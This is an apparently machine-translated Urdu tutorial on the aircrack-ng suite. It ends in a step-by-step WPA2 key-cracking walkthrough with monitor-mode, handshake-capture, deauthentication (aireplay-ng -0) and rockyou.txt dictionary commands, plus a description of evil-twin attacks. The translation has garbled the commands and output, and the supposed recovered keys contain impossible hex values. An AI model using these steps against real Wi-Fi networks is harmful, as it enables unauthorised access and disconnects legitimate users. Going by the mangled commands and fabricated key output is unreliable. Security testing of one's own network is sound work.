ایئر کریک این جی کا استعمال کیسے کریں

How Use Aircrack Ng



زیادہ تر وقت ، لوگ کبھی بھی اس نیٹ ورک کے بارے میں نہیں سوچتے جس سے وہ جڑے ہوئے ہیں۔ وہ کبھی نہیں سوچتے کہ یہ نیٹ ورک کتنا محفوظ ہے اور وہ روزانہ کی بنیاد پر اپنے خفیہ ڈیٹا کو کتنا خطرہ بناتے ہیں۔ آپ اپنے وائی فائی نیٹ ورکس پر ایک انتہائی طاقتور ٹول استعمال کرکے کمزوری کی جانچ کر سکتے ہیں۔ ایئر کریک این جی اور وائر شارک۔ وائر شارک نیٹ ورک کی سرگرمیوں کی نگرانی کے لیے استعمال ہوتا ہے۔ ایئر کریک این جی یہ ایک جارحانہ ٹول کی طرح ہے جو آپ کو ہیک کرنے دیتا ہے اور وائرلیس کنکشن تک رسائی دیتا ہے۔ گھسنے والے کی حیثیت سے سوچنا ہمیشہ اپنے آپ کو ہیک سے بچانے کا محفوظ ترین طریقہ رہا ہے۔ ہوائی کریک کے بارے میں سیکھ کر آپ اپنے نظام تک رسائی حاصل کرنے کے لیے ایک درست اقدام کو سمجھ سکتے ہیں۔ اس کے بعد آپ اپنے نظام پر تعمیل کی جانچ کر سکتے ہیں تاکہ یہ یقینی بنایا جا سکے کہ یہ غیر محفوظ نہیں ہے۔

ایئر کریک این جی وائی ​​فائی نیٹ ورک سیکیورٹی کو جانچنے کے لیے تیار کردہ سافٹ وئیر کا ایک مکمل سیٹ ہے۔ یہ صرف ایک ٹول نہیں بلکہ ٹولز کا مجموعہ ہے ، جن میں سے ہر ایک ایک خاص مقصد کو انجام دیتا ہے۔ وائی ​​فائی سیکورٹی کے مختلف شعبوں پر کام کیا جاسکتا ہے ، جیسے ایکسیس پوائنٹ کی نگرانی ، ٹیسٹنگ ، نیٹ ورک پر حملہ ، وائی فائی نیٹ ورک کو توڑنا ، اور اس کی جانچ کرنا۔ ایئر کریک کا بنیادی مقصد پیکٹوں کو روکنا اور پاس ورڈ توڑنے کے لیے ہیش کو سمجھنا ہے۔ یہ تقریبا تمام نئے وائرلیس انٹرفیس کی حمایت کرتا ہے۔ ایئر کریک این جی ایک فرسودہ ٹول سوٹ ایئر کریک کا ایک بہتر ورژن ہے ، این جی سے مراد ہے۔ نئی نسل . کچھ خوفناک ٹولز جو بڑے کام کو انجام دینے میں مل کر کام کرتے ہیں۔







ایئرمون:

ائیرمون-این جی ایئر کریک-این جی کٹ میں شامل ہے جو نیٹ ورک انٹرفیس کارڈ کو مانیٹر موڈ میں رکھتا ہے۔ نیٹ ورک کارڈ عام طور پر صرف ان کے لیے نشانہ بنائے گئے پیکٹ قبول کریں گے جیسا کہ این آئی سی کے میک ایڈریس نے بیان کیا ہے ، لیکن ائیرمون این جی کے ساتھ ، تمام وائرلیس پیکٹ ، چاہے وہ ان کے لیے نشانہ بنائے گئے ہوں یا نہیں ، بھی قبول کیے جائیں گے۔ آپ ان پیکٹوں کو رسائی کے مقام سے منسلک کیے بغیر یا تصدیق کیے بغیر پکڑ سکتے ہیں۔ یہ نیٹ ورک انٹرفیس کو مانیٹر موڈ میں ڈال کر ایک ایکسیس پوائنٹ کی حیثیت چیک کرنے کے لیے استعمال ہوتا ہے۔ سب سے پہلے مانیٹر موڈ کو آن کرنے کے لیے وائرلیس کارڈز کو کنفیگر کرنا ہوگا ، پھر اگر آپ کو لگتا ہے کہ کوئی بھی عمل اس میں مداخلت کر رہا ہے تو پس منظر کے تمام عمل کو ختم کردیں۔ عمل کو ختم کرنے کے بعد ، مانیٹر موڈ کو وائرلیس انٹرفیس پر ذیل میں کمانڈ چلا کر فعال کیا جا سکتا ہے۔



[ای میل محفوظ]: ~ $۔سودوairmon-ng شروع wlan0#

آپ نیچے دی گئی کمانڈ کا استعمال کرتے ہوئے کسی بھی وقت ائیرمون-این جی کو روک کر مانیٹر موڈ کو غیر فعال کر سکتے ہیں۔

[ای میل محفوظ]: ~ $۔سودوایئرمون-این جی سٹاپ wlan0#

ایرو ڈمپ:

ایروڈمپ این جی کا استعمال ہمارے ارد گرد کے تمام نیٹ ورکس کی فہرست بنانے اور ان کے بارے میں قیمتی معلومات دیکھنے کے لیے کیا جاتا ہے۔ ایروڈمپ این جی کی بنیادی فعالیت پیکٹوں کو سونگھنا ہے ، لہذا یہ بنیادی طور پر پروگرام کیا گیا ہے کہ مانیٹر موڈ میں ڈالتے ہوئے ہمارے ارد گرد کے تمام پیکٹ پکڑ لیں۔ ہم اسے اپنے آس پاس کے تمام کنکشنز کے خلاف چلائیں گے اور نیٹ ورک سے منسلک کلائنٹس کی تعداد ، ان کے متعلقہ میک ایڈریسز ، انکرپشن سٹائل اور چینل کے ناموں جیسے ڈیٹا اکٹھا کریں گے اور پھر اپنے ٹارگٹ نیٹ ورک کو نشانہ بنانا شروع کریں گے۔

airodump-ng کمانڈ ٹائپ کرکے اور اسے نیٹ ورک انٹرفیس کا نام پیرامیٹر دے کر ، ہم اس ٹول کو فعال کر سکتے ہیں۔ یہ رسائی کے تمام مقامات ، ڈیٹا پیکٹوں کی مقدار ، خفیہ کاری اور استعمال شدہ توثیقی طریقوں اور نیٹ ورک کا نام (ESSID) درج کرے گا۔ ہیکنگ کے نقطہ نظر سے ، میک ایڈریس سب سے اہم شعبے ہیں۔

[ای میل محفوظ]: ~ $۔سودوairodump-ng wlx0mon

ائیر کریک:

ایئر کریک پاس ورڈ کریکنگ کے لیے استعمال ہوتا ہے۔ ایرو ڈمپ کا استعمال کرتے ہوئے تمام پیکٹوں پر قبضہ کرنے کے بعد ، ہم ایئر کریک کے ذریعے چابی کو توڑ سکتے ہیں۔ یہ دو طریقوں PTW اور FMS کا استعمال کرتے ہوئے ان چابیاں کو توڑتا ہے۔ PTW نقطہ نظر دو مراحل میں کیا جاتا ہے۔ سب سے پہلے ، صرف اے آر پی پیکٹ استعمال کیے جا رہے ہیں ، اور تب ہی ، اگر تلاش کے بعد چابی نہیں ٹوٹی ہے ، تو یہ دوسرے پکڑے گئے تمام پیکٹ استعمال کرتا ہے۔ PTW نقطہ نظر کا ایک پلس پوائنٹ یہ ہے کہ تمام پیکٹ کریکنگ کے لیے استعمال نہیں ہوتے۔ دوسرے نقطہ نظر میں ، یعنی ، ایف ایم ایس ، ہم چابی کو توڑنے کے لیے شماریاتی ماڈلز اور برٹ فورس الگوس دونوں استعمال کرتے ہیں۔ لغت کا طریقہ بھی استعمال کیا جا سکتا ہے۔

ائیر پلے:

Airplay-ng ٹریفک بنانے یا تیز کرنے کے لیے وائرلیس نیٹ ورک میں پیکٹ متعارف کراتا ہے۔ دو مختلف ذرائع سے پیکٹ aireplay-ng کے ذریعے حاصل کیے جا سکتے ہیں۔ پہلا لائیو نیٹ ورک ہے ، اور دوسرا پہلے سے موجود pcap فائل کے پیکٹ ہیں۔ ایئر پلے-این جی غیر تصدیق شدہ حملے کے دوران مفید ہے جو وائرلیس رسائی پوائنٹ اور صارف کو نشانہ بناتا ہے۔ مزید یہ کہ ، آپ کچھ حملے کر سکتے ہیں جیسے کافی لیٹ اٹیک ائیر پلے این جی کے ساتھ ، ایک ایسا آلہ جو آپ کو کلائنٹ کے سسٹم سے کلید حاصل کرنے کی اجازت دیتا ہے۔ آپ اسے اے آر پی پیکٹ پکڑ کر حاصل کر سکتے ہیں اور پھر اس میں ہیرا پھیری کر کے اسے سسٹم میں واپس بھیج سکتے ہیں۔ کلائنٹ پھر ایک پیکٹ بنائے گا جسے ایرو ڈمپ اور ایئر کریک اس ترمیم شدہ پیکٹ کی چابی سے پکڑ سکتا ہے۔ ائیر پلے-این جی کے کچھ دوسرے اٹیک آپشنز میں چوچ چوپ ، فریگمنٹ آر پری پلے وغیرہ شامل ہیں۔

ایئربیس:

ایئربیس-این جی کا استعمال گھسنے والے کے کمپیوٹر کو دوسروں کے لنک کرنے کے لیے ایک سمجھوتہ کنکشن پوائنٹ میں تبدیل کرنے کے لیے کیا جاتا ہے۔ ایئربیس-این جی کا استعمال کرتے ہوئے ، آپ ایک قانونی رسائی کا مقام ہونے کا دعویٰ کر سکتے ہیں اور آپ کے نیٹ ورک سے منسلک کمپیوٹرز پر انسانوں کے درمیان حملے کر سکتے ہیں۔ اس قسم کے حملوں کو ایول ٹوئن اٹیک کہا جاتا ہے۔ بنیادی صارفین کے لیے قانونی رسائی نقطہ اور جعلی رسائی نقطہ کے درمیان فرق کرنا ناممکن ہے۔ لہذا ، بری جڑواں خطرہ سب سے زیادہ خطرناک وائرلیس خطرات میں سے ہے جن کا ہمیں آج سامنا ہے۔

ایرولب این جی:

ایرولب پاس ورڈ کی فہرستوں اور ایکسیس پوائنٹ کو اسٹور اور مینیج کرکے ہیکنگ کے عمل کو تیز کرتا ہے۔ اس پروگرام کے ذریعہ استعمال ہونے والا ڈیٹا بیس مینجمنٹ سسٹم SQLite3 ہے ، جو زیادہ تر تمام پلیٹ فارمز پر دستیاب ہے۔ پاس ورڈ کریکنگ میں جوڑی وار ماسٹر کلید کا حساب شامل ہے جس کے ذریعے نجی عارضی کلید (PTK) نکالی جاتی ہے۔ پی ٹی کے کا استعمال کرتے ہوئے ، آپ دیے گئے پیکٹ کے لیے فریم میسج آئیڈینٹی فکیشن کوڈ (ایم آئی سی) کا تعین کر سکتے ہیں اور نظریاتی طور پر ایم آئی سی کو پیکٹ سے ملتا جلتا پا سکتے ہیں ، لہذا اگر پی ٹی کے درست تھا تو پی ایم کے بھی ٹھیک تھا۔

پاس ورڈ کی فہرستوں کو دیکھنے اور ڈیٹا بیس میں محفوظ نیٹ ورک تک رسائی کے لیے درج ذیل کمانڈ ٹائپ کریں:

[ای میل محفوظ]: ~ $۔سودوairolib-ng testdatabase atsstats

یہاں testdatabase وہ db ہے جس تک آپ رسائی یا تخلیق کرنا چاہتے ہیں ، اور atsstats وہ آپریشن ہے جو آپ اس پر کرنا چاہتے ہیں۔ آپ ڈیٹا بیس فیلڈز پر متعدد آپریشن کر سکتے ہیں ، جیسے کچھ SSID یا کسی چیز کو زیادہ سے زیادہ ترجیح دینا۔ aircrab-ng کے ساتھ airolib-ng استعمال کرنے کے لیے ، درج ذیل کمانڈ درج کریں:

[ای میل محفوظ]: ~ $۔سودوائیر کریک این جیٹیسٹ ڈیٹا بیس wpa2.eapol.cap

یہاں ہم پہلے سے شمار شدہ PMK کو استعمال کر رہے ہیں ٹیسٹ ڈیٹا بیس پاس ورڈ کریک کرنے کے عمل کو تیز کرنے کے لیے۔

ایئر کریک این جی کا استعمال کرتے ہوئے WPA/WPA2 کو توڑنا:

آئیے اس کی ایک چھوٹی سی مثال دیکھتے ہیں کہ ائیر کریک این جی اپنے چند زبردست ٹولز کی مدد سے کیا کر سکتا ہے۔ ہم لغت کا طریقہ استعمال کرتے ہوئے WPA/WPA2 نیٹ ورک کی پہلے سے مشترکہ کلید کو توڑ دیں گے۔

پہلی چیز جو ہمیں کرنے کی ضرورت ہے وہ ہے نیٹ ورک انٹرفیس کی فہرست بنانا جو مانیٹر موڈ کو سپورٹ کرتا ہے۔ یہ مندرجہ ذیل کمانڈ کا استعمال کرتے ہوئے کیا جا سکتا ہے:

[ای میل محفوظ]: ~ $۔سودوایئرمون-این جی

PHY انٹرفیس ڈرائیور چپ سیٹ۔

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

ہم ایک انٹرفیس دیکھ سکتے ہیں اب ، ہمیں مندرجہ ذیل کمانڈ کا استعمال کرتے ہوئے مانیٹر موڈ میں (wlx0) نیٹ ورک انٹرفیس ڈالنا ہے۔

[ای میل محفوظ]: ~ $۔سودوairmon-ng wlx0 شروع کریں۔

اس نے انٹرفیس پر مانیٹر موڈ کو فعال کیا ہے۔ wlx0mon .

اب ہمیں اپنے نیٹ ورک انٹرفیس کے ذریعے قریبی راؤٹرز سے نشریات سننا شروع کرنی چاہئیں جو ہم مانیٹر موڈ میں ڈال چکے ہیں۔

[ای میل محفوظ]: ~ $۔سودوairodump-ng wlx0mon

چودھری ][گزر گیا:30۔s][ 2020۔-12۔-02 00:17۔



بی ایس ایس آئی ڈی پی ڈبلیو آر بیکنز۔#ڈیٹا ، #/s CH MB ENC CIPHER AUTH ESSID۔



E4: 6F:13۔: 04: عیسوی:31۔ -چار پانچ 62۔ 27۔ 54e WPA2 CCMP PSK CrackIt۔

C4: E9:84۔:76۔:10۔: BE۔-63۔ 77۔ 54e WPA2 CCMP PSK Hackme۔

C8: 3A:35۔: A0: 4E: 01۔-63۔ 84۔ 54e WPA2 CCMP PSK Net07۔

74۔: دیتا ہے:88۔: ایف اے:38۔: 02۔-68۔ 28۔ گیارہ54e WPA2 CCMP PSK TP-Link_3802۔



بی ایس ایس آئی ڈی اسٹیشن پی ڈبلیو آر ریٹ لوسٹ فریمز پروب۔



E4: 6F:13۔: 04: عیسوی:31۔5C: 3A:چار پانچ: D7: EA: 8B - - 1e

E4: 6F:13۔: 04: عیسوی:31۔C4:67۔: D3: C2: CD: D7 -33۔1e-6e

E4: 6F:13۔: 04: عیسوی:31۔5C: C3: 07:56۔:61۔: ای ایف -35۔ -

E4: 6F:13۔: 04: عیسوی:31۔BC:91۔: B5: F8: 7E: D5 -39۔0e- 1002۔ 13۔

ہمارا ہدف نیٹ ورک ہے۔ کریکٹ۔ اس معاملے میں ، جو فی الحال چینل 1 پر چل رہا ہے۔

یہاں ٹارگٹ نیٹ ورک کا پاس ورڈ کریک کرنے کے لیے ، ہمیں 4 طرفہ مصافحہ کرنے کی ضرورت ہے ، جو اس وقت ہوتا ہے جب کوئی آلہ کسی نیٹ ورک سے جڑنے کی کوشش کرتا ہے۔ ہم اسے درج ذیل کمانڈ کے ذریعے حاصل کر سکتے ہیں۔

[ای میل محفوظ]: ~ $۔سودوایروڈمپ-این جی-سی --bssid E4: 6F:13۔: 04: عیسوی:31۔ -میں /گھر wlx0

-سی : چینل۔

- بی ایس ایس : ٹارگٹ نیٹ ورک کا Bssid۔

-میں : ڈائریکٹری کا نام جہاں pcap فائل رکھی جائے گی۔

اب ہمیں نیٹ ورک سے جڑنے کے لیے کسی آلے کا انتظار کرنا ہوگا ، لیکن مصافحہ کرنے کا ایک بہتر طریقہ ہے۔ ہم مندرجہ ذیل کمانڈ کا استعمال کرتے ہوئے ڈی ایونٹیکیشن اٹیک کا استعمال کرتے ہوئے اے پی کو ڈیوائسز کی تصدیق کر سکتے ہیں۔

[ای میل محفوظ]: ~ $۔سودوایر پلے-این جی-0۔ -کوE4: 6F:13۔: 04: عیسوی:31۔

کو : ٹارگٹ نیٹ ورک کا Bssid۔

-0۔ : deauthentication حملہ۔

ہم نے تمام آلات کو منقطع کر دیا ہے ، اور اب ہمیں نیٹ ورک سے منسلک ہونے کے لیے کسی آلے کا انتظار کرنا پڑے گا۔

چودھری ][گزر گیا:30۔s][ 2020۔-12۔-02 00:02۔][WPA مصافحہ: E4: 6F:13۔: 04: عیسوی:31۔



BSSID PWR RXQ بیکنز۔#ڈیٹا ، #/s CH MB ENC CIPHER AUTH E



E4: 6F:13۔: 04: عیسوی:31۔ -47۔ 228۔ 807۔ 36۔ 54 واں WPA2 CCMP PSK P۔



بی ایس ایس آئی ڈی اسٹیشن پی ڈبلیو آر ریٹ لوسٹ فریمز پروب۔



E4: 6F:13۔: 04: عیسوی:31۔BC:91۔: B5: F8: 7E: D5 -35۔ -

E4: 6F:13۔: 04: عیسوی:31۔5C: 3A:چار پانچ: D7: EA: 8B -29۔0e- 1e 22۔

E4: 6F:13۔: 04: عیسوی:31۔ 88۔:28۔: B3:30۔:27۔: 7 ای -31۔0e- 32۔

E4: 6F:13۔: 04: عیسوی:31۔C4:67۔: D3: C2: CD: D7 -35۔0e-6e263۔ 708۔کریک آئٹ

E4: 6F:13۔: 04: عیسوی:31۔D4: 6A: 6A:99۔ED: E3 -35۔0e- 0e 86۔

E4: 6F:13۔: 04: عیسوی:31۔5C: C3: 07:56۔:61۔: ای ایف -37۔ - 1e

ہمیں ایک ہٹ ملی ، اور اس وقت کے اگلے دائیں کونے کو دیکھ کر ، ہم دیکھ سکتے ہیں کہ مصافحہ کیا گیا ہے۔ اب مخصوص فولڈر میں دیکھیں ( /گھر ہمارے معاملے میں) a کے لیے۔ .pcap فائل.

WPA کلید کو توڑنے کے لیے ، ہم درج ذیل کمانڈ استعمال کر سکتے ہیں۔

[ای میل محفوظ]: ~ $۔سودوائیر کریک این جی-ا 2۔ -میںrockyou.txtE4: 6F:13۔: 04: عیسوی:31۔handshake.cap

b: ٹارگٹ نیٹ ورک کا Bssid۔

-a2: WPA2 موڈ۔

Rockyou.txt: لغت۔فائلاستعمال کیا

Handshake.cap:فائل کونساپکڑے گئے مصافحہ پر مشتمل ہے۔

ایئر کریک این جی1.2بیٹا 3۔

[00:01:49۔] 10566۔چابیاں آزمائی گئی(1017.96۔کو/s)

کلیدی تلاش! [آپ نے مجھے پکڑ لیا]

ماسٹر کلید: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0۔89۔6 بی 7 بی 6 ڈی۔

0C 06 08 ED BC 6B H7 J8 K1 A0۔89۔6B 7B B F7 6F۔پچاسج۔


عارضی کلید: 4D C4 5R 6T76۔ 99۔6G 7H 8D EC

H7 J8 K1 A0۔89۔6B 7B 6D AF 5B 8D 2D A0۔89۔6 بی۔

A5 BD K1 A0۔89۔6B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A0۔89۔

8D EC 0C EA D2 BC 6B H7 J8 K1 A0۔89۔6 بی۔

میک: CB 5A F8 CE۔62۔B2 1B F7 6F۔پچاسC025۔ 62۔E9 5D۔71۔

ہمارے ٹارگٹ نیٹ ورک کی کلید کامیابی سے ٹوٹ گئی ہے۔

نتیجہ:

وائرلیس نیٹ ورک ہر جگہ موجود ہیں ، ہر کمپنی استعمال کرتی ہے ، اسمارٹ فون استعمال کرنے والے کارکنوں سے لے کر صنعتی کنٹرول آلات تک۔ تحقیق کے مطابق ، 2021 میں انٹرنیٹ ٹریفک کا تقریبا 50 50 فیصد وائی فائی پر ہوگا۔ وائرلیس نیٹ ورکس کے بہت سے فوائد ہیں ، دروازوں کے باہر مواصلات ، ایسی جگہوں پر انٹرنیٹ کی فوری رسائی جہاں تاریں لگانا تقریبا impossible ناممکن ہے ، کیبلز لگائے بغیر نیٹ ورک کو بڑھا سکتے ہیں کسی دوسرے صارف کے لیے ، اور آپ اپنے موبائل آلات کو آپ کے گھر کے دفاتر سے آسانی سے جوڑ سکتے ہیں جبکہ آپ وہاں نہیں ہیں۔

ان فوائد کے باوجود ، آپ کی رازداری اور حفاظت کے بارے میں ایک بڑا سوالیہ نشان ہے۔ ان نیٹ ورکس کے طور پر روٹرز کی ترسیل کی حد کے اندر ہر ایک کے لیے کھلا ہے ، ان پر آسانی سے حملہ کیا جا سکتا ہے ، اور آپ کے ڈیٹا پر آسانی سے سمجھوتہ کیا جا سکتا ہے۔ مثال کے طور پر ، اگر آپ کسی پبلک وائی فائی سے جڑے ہوئے ہیں ، اس نیٹ ورک سے منسلک کوئی بھی شخص آپ کے نیٹ ورک کی ٹریفک کو کچھ ذہانت کے ذریعے اور دستیاب خوفناک ٹولز کی مدد سے آسانی سے چیک کر سکتا ہے اور اسے ڈمپ بھی کر سکتا ہے۔